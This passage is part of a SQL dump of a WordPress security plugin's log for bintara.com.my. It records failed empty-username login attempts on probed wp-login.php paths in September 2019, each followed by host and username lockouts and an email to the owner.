master@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZDM0nlR@6WyRVzpiDuuwAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080115.2198\";s:12:\"REQUEST_TIME\";s:10:\"1569080115\";}}','notice','2019-09-21 15:35:16','2019-09-21 15:35:15',27570528,29122936,'https://bintara.com.my/wordpress/wp-login.php',1,0,'107.189.2.90'),(26699,0,'lockout','host-lockout::107.189.2.90','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"107.189.2.90\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:35:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:35:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:35:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:35:15\";s:12:\"lockout_host\";s:12:\"107.189.2.90\";}','action','2019-09-21 15:35:16','2019-09-21 15:35:15',27652864,29122936,'https://bintara.com.my/wordpress/wp-login.php',1,0,'107.189.2.90'),(26700,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"107.189.2.90\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:35:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:35:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:35:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:35:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:35:16','2019-09-21 15:35:15',27652912,29122936,'https://bintara.com.my/wordpress/wp-login.php',1,0,'107.189.2.90'),(26701,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:35:16','2019-09-21 15:35:15',28014616,29122936,'https://bintara.com.my/wordpress/wp-login.php',1,0,'107.189.2.90'),(26702,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=82b8156fecf4765c428a286a4dd2f9f5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZDSknlR@6WyRVzpiDuxgAAAAY\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.175.6\";s:11:\"REMOTE_PORT\";s:5:\"35860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZDSknlR@6WyRVzpiDuxgAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080139.0246\";s:12:\"REQUEST_TIME\";s:10:\"1569080139\";}}','notice','2019-09-21 15:35:41','2019-09-21 15:35:39',27567896,29120848,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.175.6'),(26703,0,'lockout','host-lockout::128.199.175.6','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"128.199.175.6\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:35:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:35:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:35:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:35:39\";s:12:\"lockout_host\";s:13:\"128.199.175.6\";}','action','2019-09-21 15:35:41','2019-09-21 15:35:39',27650240,29120848,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.175.6'),(26704,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"128.199.175.6\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:35:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:35:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:35:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:35:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:35:41','2019-09-21 15:35:39',27650208,29120848,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.175.6'),(26705,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:35:41','2019-09-21 15:35:39',28012056,29120848,'https://bintara.com.my/blog/wp-login.php',1,0,'128.199.175.6'),(26706,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=54c109e2f9b85eea1acf97c714f0e7ac\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZDYUnlR@6WyRVzpiDu1AAAAAk\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"57494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZDYUnlR@6WyRVzpiDu1AAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569080161.805\";s:12:\"REQUEST_TIME\";s:10:\"1569080161\";}}','notice','2019-09-21 15:36:03','2019-09-21 15:36:02',27567904,29119816,'https://bintara.com.my/wp/wp-login.php',1,0,'148.72.23.181'),(26707,0,'lockout','host-lockout::148.72.23.181','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"148.72.23.181\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:36:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:36:02\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:36:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:36:02\";s:12:\"lockout_host\";s:13:\"148.72.23.181\";}','action','2019-09-21 15:36:03','2019-09-21 15:36:02',27650184,29119816,'https://bintara.com.my/wp/wp-login.php',1,0,'148.72.23.181'),(26708,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"148.72.23.181\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:36:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:36:02\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:36:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:36:02\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:36:03','2019-09-21 15:36:02',27650184,29119816,'https://bintara.com.my/wp/wp-login.php',1,0,'148.72.23.181'),(26709,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:36:03','2019-09-21 15:36:02',28011984,29119816,'https://bintara.com.my/wp/wp-login.php',1,0,'148.72.23.181'),(26710,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=51d1efb331c647a4df81cb5ac81b280f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZDk0nlR@6WyRVzpiDu-wAAAAM\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"166.111.80.223\";s:11:\"REMOTE_PORT\";s:5:\"44876\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZDk0nlR@6WyRVzpiDu-wAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569080211.903\";s:12:\"REQUEST_TIME\";s:10:\"1569080211\";}}','notice','2019-09-21 15:36:53','2019-09-21 15:36:52',27569760,29124600,'https://bintara.com.my/test/wp-login.php',1,0,'166.111.80.223'),(26711,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:36:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:36:52\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:36:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:36:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:36:53','2019-09-21 15:36:52',27651160,29124600,'https://bintara.com.my/test/wp-login.php',1,0,'166.111.80.223'),(26712,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:36:53','2019-09-21 15:36:52',28012152,29124600,'https://bintara.com.my/test/wp-login.php',1,0,'166.111.80.223'),(26713,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=87bc35773888a1b2b34f80144cbee0f3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZDpTDrcQxTmGrCWuaX4AAAAcc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"177.36.8.226\";s:11:\"REMOTE_PORT\";s:5:\"44972\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZDpTDrcQxTmGrCWuaX4AAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569080229.7711\";s:12:\"REQUEST_TIME\";s:10:\"1569080229\";}}','notice','2019-09-21 15:37:11','2019-09-21 15:37:10',27570656,29123176,'https://bintara.com.my/test/wp-login.php',1,0,'177.36.8.226'),(26714,0,'lockout','host-lockout::177.36.8.226','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"177.36.8.226\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:37:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:37:10\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:37:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:37:10\";s:12:\"lockout_host\";s:12:\"177.36.8.226\";}','action','2019-09-21 15:37:11','2019-09-21 15:37:10',27653144,29123176,'https://bintara.com.my/test/wp-login.php',1,0,'177.36.8.226'),(26715,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"177.36.8.226\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:37:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:37:10\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:37:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:37:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:37:11','2019-09-21 15:37:10',27653160,29123176,'https://bintara.com.my/test/wp-login.php',1,0,'177.36.8.226'),(26716,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:37:11','2019-09-21 15:37:10',28014992,29123176,'https://bintara.com.my/test/wp-login.php',1,0,'177.36.8.226'),(26717,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=118bc54de84225aae9316cdb0c1bce14\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 